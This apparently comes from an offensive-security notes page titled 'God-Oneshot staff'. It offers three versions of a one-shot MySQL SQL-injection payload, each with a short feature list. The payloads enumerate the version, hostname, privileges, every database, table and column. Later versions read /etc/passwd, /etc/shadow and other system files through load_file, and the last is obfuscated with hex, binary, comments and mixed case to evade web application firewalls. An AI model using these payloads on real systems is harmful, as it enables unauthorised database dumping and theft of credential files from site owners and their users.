God-Oneshot staff
V1 features:
Database version
hostname Privileges
Account and enumeration of all databases
Count and enumeration of all tables in the current database with their
respective columns
/*!50000cOnCat*/(0x3c68313e5f59303030215f3c2f68313e,0x3c703e56657273696f6e3a203c2f703e,@@version,0x3c62723e,0x3c703e486f73746e616d653a203c2f703e,@@hostname,0x3c62723e,0x3c62723e,0x3c613e50726976696c6567696f733a203c2f613e,0x3c62723e,(/*!50000SElECT*/+/*!50000GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)*/+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),0x3c62723e,0x3c613e546f74616c204261736573206465206461746f733a203c2f613e,0x3c62723e,(SELECT+count(/*!50000cOnCat*/(schema_name))+FROM+INFORMATION_SCHEMA.schemata),0x3c62723e,0x3c703e446174616261736573203a203c2f703e,(select grouP_ConCat(/*!50000schema_name/**8**/*/,0x3c62723e)+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/),0x3c62723e,0x3c613e42617365206465206461746f73207574696c697a6164613a203c2f613e,0x3c62723e,database(),0x3c62723e,0x3c62723e,0x3c613e4e756d65726f206465207461626c61733a203c2f613e,0x3c62723e,(SELECT+count(CONCAT(table_name))+FROM+INFORMATION_SCHEMA.tables+where+table_schema=database()),0x3c62723e,0x3c62723e,0x3c613e5461626c617320792073757320636f6c756d6e61733a203c2f613e,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
V1.5 features:
Database version
hostname
Privileges
Account and enumeration of all databases
Count and enumeration of all tables in the current database with their
respective columns
The IFNULL function was implemented to go to the local fire read if you have the permissions
/*!50000cOnCat*/(0x3c68313e5f59303030215f3c2f68313e,0x3c703e56657273696f6e3a203c2f703e,@@version,0x3c62723e,0x3c703e486f73746e616d653a203c2f703e,@@hostname,0x3c62723e,0x3c62723e,0x3c613e4469726563746f72696f20696e7374616c63696f6e2062617365206465206461746f733a203c2f613e,@@datadir,0x3c62723e,0x3c62723e,0x3c613e50726976696c6567696f733a203c2f613e,0x3c62723e,(/*!50000SElECT*/+/*!50000GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)*/+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),0x3c62723e,0x3c613e4c69737461206465207573756172696f733a203c2f613e,0x3c62723e,(/*!50000SElECT*/+/*!50000IFNULL(group_concat(grantee,privilege_type,is_grantable,0x3c62723e),'NO CUENTAS CON PERMISOS')*/+FROM information_schema.user_privileges WHERE privilege_type = 'SUPER'),0x3c62723e,0x3c62723e,0x3c613e546f74616c204261736573206465206461746f733a203c2f613e,0x3c62723e,(SELECT+count(/*!50000cOnCat*/(schema_name))+FROM+INFORMATION_SCHEMA.schemata),0x3c62723e,0x3c703e446174616261736573203a203c2f703e,(select%20grouP_ConCat(/*!50000schema_name/**8**/*/,0x3c62723e)+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/),0x3c62723e,0x3c613e42617365206465206461746f73207574696c697a6164613a203c2f613e,0x3c62723e,database(),0x3c62723e,0x3c62723e,0x3c613e4e756d65726f206465207461626c61733a203c2f613e,0x3c62723e,(SELECT+count(CONCAT(table_name))+FROM+INFORMATION_SCHEMA.tables+where+table_schema=database()),0x3c62723e,0x3c62723e,0x3c613e5461626c617320792073757320636f6c756d6e61733a203c2f613e,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),0x3c62723e,0x3c62723e,0x3c613e4c6f63616c2066696c65207265616420284c696e7578293a203c2f613e,0x3c62723e,0x3c62723e,0x3c613e2f6574632f7061737377643a203c2f613e,0x3c62723e,(select+ifnull(concat(load_file('/etc/passwd')),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0x3c613e2f6574632f736861646f773a203c2f613e,0x3c62723e,(select+ifnull(concat(load_file('/etc/shadow')),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0x3c613e2f6574632f67726f75703a203c2f613e,0x3c62723e,(select+ifnull(concat(load_file('/etc/group')),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0x3c613e2f6574632f686f7374733a203c2f613e,0x3c62723e,(select+ifnull(concat(load_file('/etc/hosts')),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0x3c613e2f6574632f6f732d72656c656173653a203c2f613e,0x3c62723e,(select+ifnull(concat(load_file('/etc/os-release')),'NO CUENTAS CON PERMISOS')))
V1.5 adapted to bypass some waf, has:
Database version
hostname
Privileges
Account and enumeration of all databases
Count and enumeration of all tables in the current database with their
respective columns
The IFNULL function was implemented to go to the local fire read if you have the permissions
Used encodings:
Hexadecimal
Binary
SQL Comments
URL Uppercase and lowercase
/*!50000COnCaT*/(0x3c68313e5f59303030215f3c2f68313e,0x3c703e56657273696f6e3a203c2f703e,/*!50000@@VerSion*/,0x3c62723e,0x3c703e486f73746e616d653a203c2f703e,/*!50000@@hOstName*/,0x3c62723e,0x3c62723e,0x3c613e4469726563746f72696f20696e7374616c63696f6e2062617365206465206461746f733a203c2f613e,/*!50000@@DatAdir*/,0x3c62723e,0x3c62723e,0x3c613e50726976696c6567696f733a203c2f613e,0x3c62723e,(/*!50000SelecT*/%20/*!50000grouP_conCat(GRANTEE,0x202d3e20,IS_GRANTABLE)*/+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.USEr_PRiVIleGES*/),0x3c62723e,0x3c62723e,0b0011110001100001001111100101010101110011011101010110000101110010011010010110111101110011001000000110001101101111011011100010000001110000011001010111001001101101011010010111001101101111011100110010000001110010011011110110111101110100001110100010000000111100001011110110000100111110,0x3c62723e,(/*!50000SelecT*/%20/*!50000IfNuLL(/*!50000grouP_conCat(grantee,privilege_type,is_grantable,0x3c62723e),%27NO%20CUENTAS%20CON%20PERMISOS%27)*/+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.USEr_PRiVIleGES*/%20/*!50000WHERe%20/**8**/*/+/*!50000privilege_type/**8**/*/%20=%20%27SUPER%27),0x3c62723e,0x3c62723e,0b001111000110000100111110010011100111010101101101001011100010000001100010011000010111001101100101001000000110010001100101001000000110010001100001011101000110111101110011001110100010000000111100001011110110000100111110,0x3c62723e,(/*!50000SelecT*/%20/*!50000CoUnT(/*!50000COnCaT*/(/*!50000schema_name/**8**/*/)/**8**/)+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/)/**8**/,0x3c62723e,0x3c62723e,0b0011110001100001001111100110001001100001011100110110010101110011001000000110010001100101001000000110010001100001011101000110111101110011001110100010000000111100001011110110000100111110,0x3c62723e,(/*!50000SelecT*/%20/*!50000grouP_conCat(/*!50000schema_name/**8**/*/,0x3c62723e)/**8**/+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/),0x3c62723e,0b00111100011000010011111001001110011101010110110100101110001000000110001001100001011100110110010100100000011001000110010100100000011101000110000101100010011011000110000101110011001110100010000000111100001011110110000100111110,0x3c62723e,(/*!50000SelecT*/%20/*!50000CoUnT(/*!50000COnCaT*/(/*!50000table_name/**8**/*/))+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.tabLes*/+/*!50000wHerE*/+/*!50000table_schema*/=/*!50000databAse/**8**/()*//**/),0x3c62723e,(/*!50000SelecT*/(@x)/*!50000fRom/**8**/*/(/*!50000SelecT*/(@x:=0x00),(/*!50000SelecT*/(0)/*!50000fRom/**8**/*/(/*!50000iNfoRmAtiOn_sChEmA/**_**/.cOlumNs*/)/*!50000where/**8**/*/(/*!50000table_schema*/=/*!50000databAse/**8**/()*//**/)/*!50000and*/(0x00)in(@x:=/*!50000COnCaT*/+(@x,0x3c62723e,/*!50000tablE_name*/,0x203a3a20,/*!50000columN_name*/))))x),0x3c62723e,0x3c62723e,0b001111000110000100111110010011000110111101100011011000010110110000100000011001100110100101101100011001010010000001110010011001010110000101100100001110100010000000111100001011110110000100111110,0x3c62723e,0x3c62723e,0b0011110001100001001111100010111101100101011101000110001100101111011100000110000101110011011100110111011101100100001110100010000000111100001011110110000100111110,0x3c62723e,(/*!50000SelecT*/%20+/*!50000iFnUll*/(/*!50000COnCaT*/(/*!50000loaD_fiLe*/(0x2f6574632f706173737764)),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0b001011110110010101110100011000110010111101110011011010000110000101100100011011110111011100111010,0x3c62723e,(/*!50000SelecT*/%20+/*!50000iFnUll*/(/*!50000COnCaT*/(/*!50000loaD_fiLe*/(0x2f6574632f736861646f77)),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0b0010111101100101011101000110001100101111011001110111001001101111011101010111000000111010,0x3c62723e,(/*!50000SelecT*/%20+/*!50000iFnUll*/(/*!50000COnCaT*/(/*!50000loaD_fiLe*/(0x2f6574632f67726f7570)),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0b0010111101100101011101000110001100101111011010000110111101110011011101000111001100111010,0x3c62723e,(/*!50000SelecT*/%20+/*!50000iFnUll*/(/*!50000COnCaT*/(/*!50000loaD_fiLe*/(0x2f6574632f686f737473)),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0b00101111011001010111010001100011001011110110111101110011001011010111001001100101011011000110010101100001011100110110010100111010,0x3c62723e,(/*!50000SelecT*/%20+/*!50000iFnUll*/(/*!50000COnCaT*/(/*!50000loaD_fiLe*/(0x2f6574632f6f732d72656c65617365)),'NO CUENTAS CON PERMISOS')))Last updated